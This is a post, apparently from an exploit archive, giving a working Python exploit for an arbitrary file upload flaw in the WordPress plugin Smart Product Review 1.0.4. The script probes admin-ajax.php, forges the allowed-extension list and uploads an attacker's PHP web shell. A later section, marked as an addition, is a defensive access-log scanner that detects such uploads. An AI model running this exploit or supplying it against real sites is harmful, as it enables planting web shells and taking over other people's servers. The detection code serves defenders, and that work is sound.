WordPress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload
2022-06-23 22:13:00 【Khan security team】
Vendor homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
Version: <= 1.0.4
Tested on: Kali Linux
```python
import os.path
from os import path
import json
import requests
import time
import sys

def banner():
    animation = "|/-\\"
    for i in range(20):
        time.sleep(0.1)
        sys.stdout.write("\r" + animation[i % len(animation)])
        sys.stdout.flush()
        #do something
    print("Smart Product Review 1.0.4 - Arbitrary File Upload")
    print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")

def usage():
    print("Usage: python3 exploit.py [target url] [your shell]")
    print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")

def vuln_check(uri):
    response = requests.get(uri)
    raw = response.text
    if ("No script kiddies please!!" in raw):
        return False
    else:
        return True

def main():
    banner()
    if(len(sys.argv) != 3):
        usage()
        sys.exit(1)
    base = sys.argv[1]
    file_path = sys.argv[2]
    ajax_action = 'sprw_file_upload_action'
    admin = '/wp-admin/admin-ajax.php'
    uri = base + admin + '?action=' + ajax_action
    check = vuln_check(uri)
    if(check == False):
        print("(*) Target not vulnerable!")
        sys.exit(1)
    if( path.isfile(file_path) == False):
        print("(*) Invalid file!")
        sys.exit(1)
    files = {'files[]' : open(file_path)}
    data = {
        "allowedExtensions[0]" : "jpg",
        "allowedExtensions[1]" : "php4",
        "allowedExtensions[2]" : "phtml",
        "allowedExtensions[3]" : "png",
        "qqfile" : "files",
        "element_id" : "6837",
        "sizeLimit" : "12000000",
        "file_uploader_nonce" : "2b102311b7"
    }
    print("Uploading Shell...")
    response = requests.post(uri, files=files, data=data )
    file_name = path.basename(file_path)
    if("ok" in response.text):
        print("Shell Uploaded!")
        print("Shell URL on your Review/Comment")
    else:
        print("Shell Upload Failed")
        sys.exit(1)

main()
```
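For defenders, the following is an added example (not part of the original post or the exploit author's code) that scans web access logs for requests naming the `sprw_file_upload_action` AJAX action and for script-type files later served from the uploads tree. It assumes Combined Log Format and the standard `/wp-content/uploads/` directory, and it goes beyond the `php4`/`phtml` extensions shown above by also matching other extensions commonly mapped to PHP; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# AJAX action name taken from the script on this page.
UPLOAD_ACTION = "sprw_file_upload_action"
# php4/phtml come from the page; the others are added here as commonly PHP-mapped extensions.
EXEC_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}
# Assumption: uploaded files land under the standard WordPress uploads directory.
UPLOAD_DIR = "/wp-content/uploads/"

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def scan(lines):
    """Return findings as (kind, client_ip, timestamp, target) tuples."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        path = url.path.lower()
        query = parse_qs(url.query)
        # Any request to admin-ajax.php that names the plugin's upload action.
        if path.endswith("/wp-admin/admin-ajax.php") and UPLOAD_ACTION in query.get("action", []):
            kind = "upload-attempt" if method == "POST" else "upload-probe"
            findings.append((kind, ip, ts, target))
        # A script-type file served successfully from the uploads tree.
        elif UPLOAD_DIR in path and path.rsplit(".", 1)[-1] in EXEC_EXT and status == "200":
            findings.append(("uploaded-script-hit", ip, ts, target))
    return findings

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Jun/2022:22:10:01 +0000] "GET /wp-admin/admin-ajax.php?action=sprw_file_upload_action HTTP/1.1" 200 31 "-" "python-requests/2.27.1"',
    '198.51.100.7 - - [23/Jun/2022:22:10:02 +0000] "POST /wp-admin/admin-ajax.php?action=sprw_file_upload_action HTTP/1.1" 200 58 "-" "python-requests/2.27.1"',
    '203.0.113.20 - - [23/Jun/2022:22:10:05 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/Jun/2022:22:11:40 +0000] "GET /wp-content/uploads/2022/06/review.phtml HTTP/1.1" 200 4 "-" "curl/7.81.0"',
    '203.0.113.20 - - [23/Jun/2022:22:12:00 +0000] "GET /wp-content/uploads/2022/06/photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```

Access logs record only the query string, so a request that carries the action name in the POST body instead will not match; pair this with a filesystem sweep of the uploads directory for the same extensions.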